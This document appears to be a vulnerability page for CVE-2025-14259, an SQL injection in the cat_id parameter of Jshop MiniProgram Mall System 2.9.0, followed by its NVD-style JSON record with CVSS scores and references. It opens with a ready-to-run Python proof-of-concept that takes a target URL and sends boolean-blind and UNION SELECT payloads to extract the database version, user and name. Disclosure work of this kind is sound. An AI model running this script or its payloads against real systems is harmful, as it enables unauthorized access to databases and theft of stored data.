CVE-2025-14259

import requests import sys def exploit_sql_injection(target_url, cat_id_payload): """ PoC for CVE-2025-14259: Jshop MiniProgram Mall System SQL Injection Target: /index.php/api.html endpoint with cat_id parameter """ try: # Construct the vulnerable URL params = {'cat_id': cat_id_payload} # Send the malicious request response = requests.get(target_url, params=params, timeout=10) print(f"[*] Target: {target_url}") print(f"[*] Payload: {cat_id_payload}") print(f"[*] Status Code: {response.status_code}") print(f"[*] Response Length: {len(response.text)}") return response except requests.exceptions.RequestException as e: print(f"[!] Error: {e}") return None def test_boolean_blind_injection(target_url): """Test for boolean-based blind SQL injection""" # True condition payload true_payload = "1 AND 1=1" # False condition payload false_payload = "1 AND 1=2" print("\n[*] Testing boolean-based blind injection...") resp_true = exploit_sql_injection(target_url, true_payload) resp_false = exploit_sql_injection(target_url, false_payload) if resp_true and resp_false: if len(resp_true.text) != len(resp_false.text): print("[+] Boolean blind injection confirmed!") def test_union_injection(target_url): """Test for UNION-based SQL injection to extract data""" union_payload = "1 UNION SELECT NULL,NULL,NULL,NULL,version(),user(),database(),NULL-- -" print(f"\n[*] Testing UNION-based injection...") exploit_sql_injection(target_url, union_payload) if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-14259.py <target_url>") print("Example: python cve-2025-14259.py http://target.com/index.php/api.html") sys.exit(1) target = sys.argv[1] # Basic test exploit_sql_injection(target, "1") # Test blind injection test_boolean_blind_injection(target) # Test union injection test_union_injection(target)

{"cve": {"id": "CVE-2025-14259", "sourceIdentifier": "[email protected]", "published": "2025-12-08T18:15:50.540", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was found in Jihai Jshop MiniProgram Mall System 2.9.0. Affected by this issue is some unknown functionality of the file /index.php/api.html. The manipulation of the argument cat_id results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "http://101.200.76.102:38765/qwertyuiop/qwsdfvbnm/1/vuldb/Jshop/Jshop.html", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.334765", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334765", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.702613", "source": "[email protected]"}]}}